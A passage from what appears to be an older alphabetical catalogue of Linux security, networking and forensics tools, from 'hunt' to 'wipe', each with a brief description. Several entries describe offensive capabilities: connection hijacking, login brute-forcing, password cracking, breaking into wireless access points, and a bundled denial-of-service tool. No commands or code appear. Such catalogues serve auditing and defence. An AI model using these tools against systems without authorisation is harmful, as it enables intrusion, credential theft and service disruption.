hunt – Hunt is a tool for exploiting well known weaknesses in the TCP/IP protocol. Used primarily to hijack connections, but has many other features.
hydra – the world’s first parallel login hacker. With this tool you are able to attack several services at once.
icmpinfo – Tracks ICMP packets, allowing you to proactively watch for suspicious behaviour, mainly ICMP unreachables.
icmpush – program that sends ICMP error packets and obtains remote info through ICMP packets. Supports spoofing and broadcasting. This new release supports the following ICMP error types: Unreach, Parameter Problem, Redirect and Source Quench; ICMP information types: Timestamp, Address Mask Request, Information Request, Router Solicitation (Router Discovery), Router Advertisement (Router Discovery) and Echo Request. This program features an excellent interface with a wide number of options (flags) and values. As an added bonus, Slayer has included a mini-script called try_reset that tries to reset existing telnet or rlogin connections. Your security auditing toolkit is not complete without this program! One of the few 5-star programs.
idswakeup – idswakeup is a Bourne shell script invoking hping2 (required) and iwu (part of this package) to generate false alarms in order to check if a network intrusion detection system works all right.
ipchains – ipchains-firewall is an easily-configurable shell script to establish masquerading and firewalling rules using ipchains.
iproute – professional set of tools to control the networking behavior in kernels 2.2.x and later.
ipsorc – TCPIP packet generator which allows you to send TCP, UDP, and ICMP packets with a GTK+ interface.
iptraf – ncurses-based IP LAN monitor that generates various network statistics including TCP info, UDP counts, ICMP and OSPF information, Ethernet load info, node stats, IP checksum errors, and others.
iputils-ping – Tools to test the reachability of network hosts
irpas – Internetwork Routing Protocol Attack Suite, a collection of programs used for advanced network operations, testing, and debugging.
isic – Crafts random packets and launches them. Can fix or randomize source/dest IPs and ports. You can specify the percentage of packets to fragment, to have IP options, to have bad IP versions… Just about every field can be automagically twiddled. It contains distinct programs for TCP, UDP, ICMP, IP with a randomized protocol field, and a program for randomized raw Ethernet frames.
isnprober – tool that samples TCP Initial Sequence Numbers and can use that information to determine if a set of IP addresses belong to the same TCP/IP stack (machine) or not.
itunnel – ICMP tunneling tool
john – John the Ripper v1.6 (UNIX — source distribution) – High quality UNIX password cracker, probably the fastest available. New Features: Batch mode, Kerberos AFS passwords support, WinNT passwords support, Idle priority support on Linux, Rule reject flags: can reject entire rules on condition, New utility: ‘unique’ (removes duplicated lines without re-ordering), New options: ‘-stdout’, ‘-status’.
kismet – 802.11b wireless network sniffer. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Features Multiple packet capture sources, Runtime network sorting by AP MAC address (bssid), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal and tcpdump compatible file logging, Airsnort-compatible “interesting” (cryptographically weak) logging, and Secure SUID behavior.
l2tpd – the Layer 2 Tunnelling Protocol Daemon
lcrzoex – toolbox for network administrators and network hackers. Lcrzoex contains over 200 functionalities using network library lcrzo. For example, one can use it to sniff, spoof, create clients/servers, create decode and display packets, etc. The Ethernet, IP, UDP, TCP, ICMP, ARP and RARP protocols are supported.
lde – disk editor for linux, originally written to help recover deleted files.
login_hacker – THC Modem Login Hacker – A tool that will attempt to break into modem dialups using scripts written for minicom. Extremely configurable and a must have for any penetration test.
lsof – Lsof is a Unix-specific diagnostic tool. Its name stands for LiSt Open Files, and it does just that. It lists information about any files that are open by processes currently running on the system.
ltrace – debugging program which runs a specified command until it exits. While the command is executing, ltrace intercepts and records the dynamic library calls which are called by the executed process and the signals received by that process. It can also intercept and print the system calls executed by the program.
mac-robber – a forensics and incident response program that collects Modified, Access, and Change (MAC) times from files. Its output can be used as input to the ‘mactime’ tool in The [at]stake Sleuth Kit (TASK) to make a time line of file activity. mac-robber is similar to running the ‘grave-robber’ tool from The Coroner’s Toolkit with the ‘-m’ flag, except this is written in C and not Perl.
macchanger – MAC Changer is a utility for viewing/manipulating the MAC addresses of network interfaces which can set specific, random, vendor-based (with a 6000+ vendor list) and device-type-based MACs.
manipulate_data – Search data on a harddisk/partition/file, extract the part you are interested in, and write it back after you (maybe) modified it.
md5deep – cross-platform program to compute MD5 message digests on an arbitrary number of files.
memfetch – dumps the memory of a program without disrupting its operation, either immediately or on the nearest fault condition (such as SIGSEGV). It can be used to examine suspicious or misbehaving processes on your system, verify that processes are what they claim to be, and examine faulty applications using your favorite data viewer so that you are not tied to the inferior data inspection capabilities in your debugger.
mtr – mtr combines the functionality of the ‘traceroute’ and ‘ping’ programs in a single network diagnostic tool.
nasm – Netwide Assembler. NASM will currently output flat-form binary files, a.out, COFF and ELF Unix object files, and Microsoft 16-bit DOS and Win32 object files.
nast – Can sniff the packets on a network interface in normal or promiscuous mode and log them. It dumps the headers of packets and the payload in ASCII or ASCII-hex format. You can apply a filter. The sniffed data can be saved in a separate file.
nbtscan – NBTscan is a program for scanning IP networks for NetBIOS name information. It sends a NetBIOS status query to each address in the supplied range and lists the received information in human readable form. For each responding host it lists the IP address, NetBIOS computer name, logged-in user name and MAC address (such as Ethernet).
nemesis – The Nemesis Project is designed to be a commandline-based, portable human IP stack for UNIX/Linux. The suite is broken down by protocol, and should allow for useful scripting of injected packet streams from simple shell scripts.
nessus – Nessus is a free, up-to-date, and full featured remote security scanner for Linux, BSD, Solaris and some other systems. It is multithreaded, plugin-based, has a nice GTK interface, and currently performs over 330 remote security checks. It has powerful reporting capabilities (HTML, LaTeX, ASCII text) and not only points out problems, but suggests a solution for each of them.
netcat – NetCat by Hobbit. Great all around TCP/IP utility loaded with features. Highly recommended.
netsed – Netsed v0.01b brings sed functionality to the network layer, allowing you to change the contents of packets traveling through your network on the fly and in a completely transparent manner. It features basic expressions and dynamic filtering, and cooperates with ipfwadm/ipchains transparent proxy rules to pick specific packets.
ngrep – an awesomely powerful network tool which strives to provide most of GNU grep’s common features, applying them to the network layer.
nikto – web server scanner which supports SSL. Nikto checks for (and if possible attempts to exploit) remote web server vulnerabilities and misconfigurations. It also looks for outdated software and modules, warns of any version specific problems, supports scans through proxies (with authentication), host Basic authentication and more. Data is kept in CSV format databases for easy maintenance, and supports the ability to automatically update local databases with current versions on the Nikto web site.
Nmap – The best and most well-known network scanner there is. Port scanning, OS detection, service detection, RPC service detection.
nstreams – a program that analyzes the network streams occurring on a network and prints them in a human readable form.
ntop – a tool that shows the network usage, similar to what the popular Unix command top does. ntop can be used in either interactive or web mode. In the first case, ntop displays the network status on the user’s terminal, whereas in web mode a web browser (e.g. Netscape) can attach to ntop (which acts as a web server) and get a dump of the network status. In the latter case, ntop can be seen as a simple RMON-like agent with an embedded web interface.
numby – scans for relay vulnerable http-proxies
obiwan – brute-force authentication attack against web servers using authentication requests, in effect to break into insecure accounts.
objobf – objobf is an obfuscator for x86/Linux ELF relocatable object files (.o files) that can produce fancy graphs to visualize function structures.
ol2mbox – This project provides libraries and applications for the conversion of Outlook and Outlook Express data files to Linux MBOX format. The flagship of this project is LibPST which converts Outlook files.
onesixtyone – efficient SNMP scanner which utilizes a sweep technique to achieve good performance. It finds SNMP devices on your network and brute-forces the community strings using a dictionary. It is possible to scan a class B network (65536 ip addresses) in under 13 seconds with a high degree of accuracy.
openssl – OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols with full-strength cryptography world-wide.
p0f – performs passive OS detection by watching SYN packets with tcpdump. Additionally, it is able to determine distance to remote host, and can be used to determine the structure of a foreign or local network. When running on the gateway of a network it is able to gather huge amounts of data and provide useful statistics. On a user-end computer it could be used to track which operating systems are making each connection. p0f supports full tcpdump-style filtering expressions, and has an easily modified fingerprinting database.
packit – Packit offers the ability to monitor, manipulate and inject IPv4 (and soon IPv6) traffic (TCP/UDP/ICMP) on and into your network. This can be valuable in testing firewalls, intrusion detection systems and in general TCP/IP auditing. At the moment Packit can be run in one of two modes: packet capture and IPv4 packet injection.
paketto – implements many of the techniques described in recent TCP/IP Black Ops talks. Scanrand implements extremely fast and efficient port, host, and network trace scanning which uses cryptographic signatures. Minewt implements a technique known as MAC Address Translation which allows several backend hosts to share the same IP address. Linkcat (lc) does at Layer 2 (Ethernet) what Netcat does for Layers 4-7 (TCP/UDP). Phentropy plots large amounts of arbitrary data onto a three dimensional volumetric matrix, allowing you to see the Strange Attractors which can be used to predict future values from an otherwise random system. Paratrace traces the path between a client and a server like traceroute but at Layer 4. It attaches to an existing, firewall-approved TCP flow, analyzing the resultant ICMP Time Exceeded replies.
partimage – utility to save partitions (ext2/3fs, reiserfs, fat16, fat32, hpfs, ntfs) into an image file. Only used blocks of the partition are saved, and the image can be compressed in gzip or bzip2 format.
photorec – a little tool to recover pictures from digital camera memory.
pnscan – Pnscan is a multi-threaded port scanner that can scan a large network very quickly. It does not have all the features that nmap has, but is much faster.
pptpd – PoPToP Point to Point Tunneling Server. This implements a Virtual Private Networking (VPN) server that is compatible with Microsoft VPN clients. It allows Windows users to connect to an internal firewalled network using their dialup.
pwl9x – The Windows 9x Password List reader is a UNIX program that will allow you to see the passwords contained in your Windows PWL database. You can check the security of these files and try to recover the main password using brute force methods.
rarpd – Reverse Address Resolution Protocol Daemon. rarpd listens on the Ethernet for broadcast packets asking for reverse address resolution. These packets are sent by hosts at boot time to find out their IP address.
recover – Undelete files on ext2 partitions
redir – a port redirector, used to forward incoming connections to somewhere else. By far the cleanest piece of code here, because someone else liked it enough to fix it.
revinetd – GNU implementation of the TCP gender changer. It operates in two modes, listen-listen and connect-connect. It can be used to forward traffic through firewalls where outbound rule sets are more liberal than inbound rules.
samba-tng – fork of Samba. It was derived from the same code but is being developed independently.
sara – Security Auditor’s Research Assistant (SARA) is a security analysis tool based on the SATAN model. It is updated frequently to address the latest threats. Checks for common old holes, backdoors, trust relationships, default cgi, common logins.
scanssh – scans a list of addresses and networks for running SSH servers and their version numbers. scanssh supports random selection of IP addresses from large network ranges and is useful for gathering statistics on the deployment of SSH servers in a company or the Internet as a whole.
scli – a collection of SNMP command line management tools
screamingcobra – an application for remote vulnerability discovery in ANY UNKNOWN web applications such as CGIs and PHP pages. Simply put, it attempts to find vulnerabilities in all web applications on a host without knowing anything about the applications. Modern CGI scanners scan a host for CGIs with known vulnerabilities. ScreamingCobra is able to ‘find’ the actual vulnerabilities in ANY CGI, whether it has been discovered before or not.
secpanel – A graphical user interface for SSH and SCP
secure_delete – Secure Deletion Utilities
sendip – a commandline tool to send arbitrary IP packets. It has a large number of command line options to specify the content of every header of a TCP, UDP, ICMP, or raw IP packet. It also allows any data to be added to the packet. Checksums can be calculated automatically, but if you wish to send out wrong checksums, that is supported too.
sharefuzz – shared library which automatically detects environment variable overflows in Unix systems. This tool can be used to ensure all necessary patches have been applied, or as a reverse engineering tool.
shiva – tool to encrypt ELF executables under Linux. Shiva can be used to wrap an executable in such a way that though it continues to run as it did before it is very difficult to debug or reverse engineer. Shiva can be used to password protect critical programs, including setuid programs, or simply to obfuscate sensitive data stored within programs.
sing – A fully programmable ping replacement
sleuthkit – collection of open source file system forensics tools that allow one to view allocated and deleted data from NTFS, FAT, FFS, and EXT2FS images. The Autopsy Forensic Browser provides a graphical interface to The Sleuth Kit.
slogdump – extracts syslog packets from tcpdump ethernet savefiles
smb-nat – This tool can perform various security checks on remote servers running NetBIOS file sharing services. It is capable of enumerating shares and making break-in attempts using a (user-provided) list of users and passwords.
snapscreenshot – takes a screenshot from a single Linux virtual console (tty) or from a group of ttys.
socat – establishes two bidirectional byte streams and transfers data between them. Data channels may be files, pipes, devices (terminal or modem, etc.), or sockets (Unix, IPv4, IPv6, raw, UDP, TCP, SSL). It provides forking, logging, and tracing, different modes for interprocess communication, and many more options.
spike – Spikeman’s DoS Attack Tool – Revision 5.2. 33 denial of service attacks at once, launched from a 61k shell script! Changes: Never Die Menu Added, new attacks
spikeproxy – functions as an HTTP and HTTPS proxy, and allows the web developer or web application auditor low level access to the entire web application interface, while also providing a bevy of automated tools and techniques for discovering common problems.
splint – tool for statically checking C programs for security vulnerabilities and coding mistakes. With minimal effort, Splint can be used as a better lint. If additional effort is invested adding annotations to programs, Splint can perform stronger checking than can be done by any standard lint.
ssh – Secure rlogin/rsh/rcp replacement
ssldump – SSLv3/TLS network protocol analyzer. It identifies TCP connections on the chosen network interface and attempts to interpret them as SSLv3/TLS traffic. When it identifies SSLv3/TLS traffic, it decodes the records and displays them in a textual form to stdout. If provided with the appropriate keying material, it will also decrypt the connections and display the application data traffic.
strace – a system call trace, a debugging tool which prints out a trace of all the system calls made by another process/program. The program to be traced need not be recompiled for this, so you can use it on binaries for which you don’t have source. System calls and signals are events that happen at the user/kernel interface. A close examination of this boundary is very useful for bug isolation, sanity checking and attempting to capture race and buffer overflow conditions.
stunnel – designed to work as an SSL encryption wrapper between a remote client and a local (inetd-startable) or remote server. The concept is that non-SSL-aware daemons running on your system can easily be set up to communicate with clients over secure SSL channels. stunnel can be used to add SSL functionality to commonly used inetd daemons like POP-2, POP-3 and IMAP servers as well as standalone daemons like NNTP, SMTP and HTTP without changes to the source code.
sudo – a program that provides limited superuser privileges. The listed version does not properly handle improper file access attempts, revealing information about file existence.
tcpdump – allows you to dump the traffic on a network. It can be used to print out the headers of packets on a network interface that matches a given expression. You can use this tool to track down network problems, to detect “ping attacks” or to monitor the network activities. Changes: -X option added, telnet command sequence decoder, many bug fixes, SMB printing, NFS parsing, AFS3 packet parsing, etc
tcpflow – a program that captures data transmitted as part of TCP connections (flows), and stores the data in a way that is convenient for protocol analysis or debugging. tcpflow understands TCP sequence numbers and will correctly reconstruct data streams regardless of retransmissions or out-of-order delivery. Each stream is stored in a separate file for later analysis.
tcpreplay – aimed at testing the performance of a NIDS by replaying real background network traffic in which to hide attacks. Tcpreplay allows you to control the speed at which the traffic is replayed, and can replay arbitrary tcpdump traces. Unlike programmatically-generated artificial traffic, which doesn’t exercise the application/protocol inspection that a NIDS performs and doesn’t reproduce the real-world anomalies that appear on production networks (asymmetric routes, traffic bursts/lulls, fragmentation, retransmissions, etc.), tcpreplay allows for exact replication of real traffic seen on real networks.
tcpslice – tool for extracting portions of packet trace files generated using tcpdump’s -w flag.
tcptrace – analyzer for tcpdump logfiles.
tct – collection of tools which are geared towards gathering and analyzing forensic data on a UNIX system after a break-in. TCT features the grave-robber tool which captures information, the ils and mactime tools that display access patterns of files dead or alive, the unrm and lazarus tools that recover deleted files, and the keyfind tool that recovers cryptographic keys from a running process or from files.
tethereal – Network traffic analyzer (console)
thcrut – local network discovery tool developed to brute force its way into wvlan access points. It offers arp-request on ip-ranges and identifies the vendor of the NIC, spoofed DHCP, BOOTP and RARP requests, icmp-address mask request and router discovery techniques. This tool should be ‘your first knife’ on a foreign network.
transproxy – The program is used in conjunction with the Linux Transparent Proxy networking feature, and ipfwadm, to transparently proxy HTTP and other requests.
tsocks – tsocks provides transparent network access through a SOCKS version 4 or 5 proxy (usually on a firewall). tsocks intercepts the calls applications make to establish TCP connections and transparently proxies them as necessary. This allows existing applications to use SOCKS without recompilation or modification.
valgrind – A memory debugger for x86-linux
vmap – utility for fingerprinting services by checking features and replies of bogus commands being fed to the daemon. Currently supports FTP, SMTP, POP3, IMAP, and HTTP.
walker – Compuserve 3.0 Password Decrypter. It decrypts Compuserve 3.0 ini files (cis.ini) that store account passwords.
wipe – Recovery of supposedly erased data from magnetic media is easier than many people would like to believe. A technique called Magnetic Force Microscopy (MFM) allows any moderately funded opponent to recover the last two or three layers of data written to disk. Wipe repeatedly overwrites special patterns onto the files to be destroyed, using the fsync() call and/or the O_SYNC bit to force disk access. Changes: Use of /dev/urandom to seed libc’s random() additive feedback pseudo-random generator; a new 32-bit seed is fetched for every 1024 bytes.